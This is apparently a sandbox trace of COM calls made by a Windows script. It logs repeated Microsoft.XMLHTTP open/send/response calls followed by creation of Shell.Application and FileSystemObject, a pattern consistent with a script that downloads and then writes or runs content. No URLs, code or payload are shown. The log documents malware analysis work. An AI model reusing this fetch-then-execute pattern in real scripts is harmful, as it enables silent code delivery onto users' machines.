	[0339.566] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0339.566] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0339.566] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0339.566] ??2@YAPEAX_K@Z () returned 0x62f330
	[0339.566] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0339.567] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0339.567] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0339.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0339.567] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0339.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0339.567] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0339.567] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.567] longjmp () 
	[0339.567] longjmp () 
	[0339.567] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0339.567] SysStringLen (param_1=0x0) returned 0x0
	[0339.568] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0339.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0339.568] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0339.568] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0339.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0339.568] ??2@YAPEAX_K@Z () returned 0x62f310
	[0339.568] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0339.568] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0339.568] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0339.568] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0339.568] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0339.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0339.569] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0339.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.569] longjmp () 
	[0339.569] longjmp () 
	[0339.569] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0339.569] SysStringLen (param_1=0x0) returned 0x0
	[0339.569] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0339.569] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0339.569] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0339.570] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0339.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0339.570] ??2@YAPEAX_K@Z () returned 0x62f330
	[0339.570] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0339.570] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0339.570] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0339.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0339.570] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0339.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0339.570] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0339.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.570] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0339.571] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0339.571] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0339.825] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0339.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0339.826] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0339.826] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0339.826] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0339.826] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0339.826] SysStringLen (param_1=0x0) returned 0x0
	[0339.826] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0339.826] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0339.826] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0339.827] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0339.827] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0339.827] ??2@YAPEAX_K@Z () returned 0x62f350
	[0339.827] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0339.827] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0339.827] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0339.827] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0339.827] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0339.827] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0339.827] SysStringLen (param_1=0x0) returned 0x0
	[0339.827] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0339.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0339.830] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0339.830] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0339.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0339.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0339.831] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0341.043] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0341.043] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0341.043] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0341.044] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0341.044] SysStringLen (param_1=0x0) returned 0x0
	[0341.044] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0341.044] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0341.044] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0341.045] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0341.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0341.045] ??2@YAPEAX_K@Z () returned 0x62f330
	[0341.045] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0341.045] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0341.045] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0341.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0341.045] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0341.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0341.045] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0341.048] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0341.048] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0341.048] SysStringLen (param_1=0x0) returned 0x0
	[0341.048] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
